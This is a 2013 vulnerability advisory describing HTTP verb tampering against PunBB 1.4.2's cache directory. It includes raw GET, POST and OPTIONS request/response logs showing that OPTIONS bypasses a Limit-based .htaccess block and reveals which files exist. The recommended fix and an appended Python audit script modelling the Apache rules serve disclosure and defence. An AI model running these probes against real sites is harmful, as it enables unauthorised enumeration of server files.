PunBB 1.4.2 HTTP VERB Tampering

2013.04.02
Credit: AkaStep
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

===============================================================
Vulnerable software: PunBB 1.4.2
Official site: http://punbb.informer.com/
Vuln: HTTP Verb Tampering
Checked version: PunBB 1.4.2
===============================================================
About software:
===============================================================
PunBB is a fast and lightweight PHP-powered discussion board. It is released under the GNU General Public License. Its primary goals are to be faster, smaller and less graphically intensive as compared to other discussion boards. PunBB has fewer features than many other discussion boards, but is generally faster and outputs smaller, semantically correct XHTML-compliant pages.
*Copy/paste from official wiki.*
===============================================================
About vuln:
punbb-1.4.2 is vulnerable to HTTP VERB tampering because it tries to restrict HTTP access to its own cache/ directory in an insecure manner. I'm pretty sure we can call the following approach "blacklisting". But as we all know, the blacklisting approach sucks as always. Take a look:

==========/punbb-1.4.2/cache/.htaccess=====
<Limit GET POST PUT>
Order Allow,Deny
Deny from All
</Limit>
=====================================
Note: THIS file is shipped by default with the latest 1.4.2 version. Other versions may also be affected but I didn't check.

Using the above .htaccess file in its cache/ directory, PunBB denies HTTP GET, POST and PUT request(s) to the files in the cache directory. But what about other HTTP methods?
Here are a few "fingerprinting" methods against real sites (notice the status codes):
===============================================================
TEST 1: GET method

REQUEST METHOD: GET
URL: http://examplesite/punbb/cache/index.html
Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive

Server Returns:
HTTP/1.1 403 Forbidden
Date: Tue, 02 Apr 2013 00:26:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 224
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /punbb/cache/index.html on this server.</p>
</body></html>
===============================================================
TEST 2: POST method

REQUEST METHOD: POST
URL: http://examplesite/punbb/cache/index.html
Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 42

$_POST data to send: &id=this is a test for HTTP VERB tampering

Server Returns:
HTTP/1.1 403 Forbidden
Date: Tue, 02 Apr 2013 00:28:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 224
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /punbb/cache/index.html on this server.</p>
</body></html>
===============================================================
TEST 3: Fun begins.

Request method: OPTIONS
URL: http://examplesite/punbb/cache/index.html
Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 0

Server returns:
HTTP/1.1 200 OK <=========== Notice
Date: Tue, 02 Apr 2013 00:32:09 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html
======================================
TEST 4: Notice again the status code: 404

Method: OPTIONS
URL: http://examplesite/punbb/cache/not_existense_filename_checking_notice_status_code.php
Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 0

Server returns:
HTTP/1.1 404 Not Found
Date: Tue, 02 Apr 2013 00:36:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 264
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /punbb/cache/not_existense_filename_checking_notice_status_code.php was not found on this server.</p>
</body></html>
======================================
Using the method(s) above, an attacker may, for example, access cache files, or at least learn which cache files exist (note the 200 versus 404 status codes). In itself this issue may open new attacks or give an attacker more chances. Do not use a blacklisting approach; use whitelisting instead.
So don't use the Limit directive in your .htaccess file. In this case a simple *deny from all* will do its own job. (If I'm wrong please correct me.)
=========================================
KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
http://exploit-db.com/
to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
*Super special KUDOS to my bro Brendan Coles! Love you and Respect you dude! Thank you!*
===========================================
/AkaStep
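The following is an added example, not part of the advisory or of PunBB itself. It models the Apache 2.2 mod_authz_host semantics that cause the problem above: a "Deny from all" wrapped in <Limit GET POST PUT> only applies to the listed methods (plus HEAD, which Apache ties to GET), so OPTIONS, TRACE and WebDAV methods fall through, whereas the same "Deny from all" outside any <Limit> covers every method. The two .htaccess fragments are constructed copies of the shipped file and the author's recommended fix; Allow directives and <LimitExcept> are deliberately not modelled.

```python
import re

# Constructed copies of the two .htaccess fragments discussed in the advisory.
WEAK_HTACCESS = """<Limit GET POST PUT>
Order Allow,Deny
Deny from All
</Limit>
"""

FIXED_HTACCESS = """Order Allow,Deny
Deny from All
"""

LIMIT_RE = re.compile(r"<Limit\s+([^>]+)>(.*?)</Limit>", re.I | re.S)
DENY_ALL_RE = re.compile(r"^\s*Deny\s+from\s+all\s*$", re.I | re.M)

def denied_methods_of(htaccess, probe_methods):
    """Return the subset of probe_methods that the fragment denies.

    Simplified Apache 2.2 model: 'Deny from all' inside <Limit M1 M2 ...>
    denies only the listed methods (method names are case-sensitive in
    Apache, and listing GET also restricts HEAD); 'Deny from all' outside
    any <Limit> denies every method.  Allow directives are not modelled.
    """
    denied = set()
    for m in LIMIT_RE.finditer(htaccess):
        methods = set(m.group(1).split())
        if "GET" in methods:
            methods.add("HEAD")  # documented Apache behaviour
        if DENY_ALL_RE.search(m.group(2)):
            denied |= methods & set(probe_methods)
    # Whatever remains after stripping the <Limit> blocks applies globally.
    if DENY_ALL_RE.search(LIMIT_RE.sub("", htaccess)):
        denied |= set(probe_methods)
    return denied

# Methods worth probing on your own deployment; TRACE/DELETE are included
# to show that the blacklist misses more than just OPTIONS.
PROBES = ["GET", "HEAD", "POST", "PUT", "OPTIONS", "TRACE", "DELETE"]

def audit(htaccess):
    """Map each probe method to 'denied' or 'ALLOWED' under the fragment."""
    denied = denied_methods_of(htaccess, PROBES)
    return {m: ("denied" if m in denied else "ALLOWED") for m in PROBES}

if __name__ == "__main__":
    for name, frag in (("weak", WEAK_HTACCESS), ("fixed", FIXED_HTACCESS)):
        print(name, audit(frag))
```

On Apache 2.4 the equivalent unconditional form is "Require all denied"; the point is the same, the directive must not sit inside a method-specific <Limit> block.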

References:

http://punbb.informer.com/

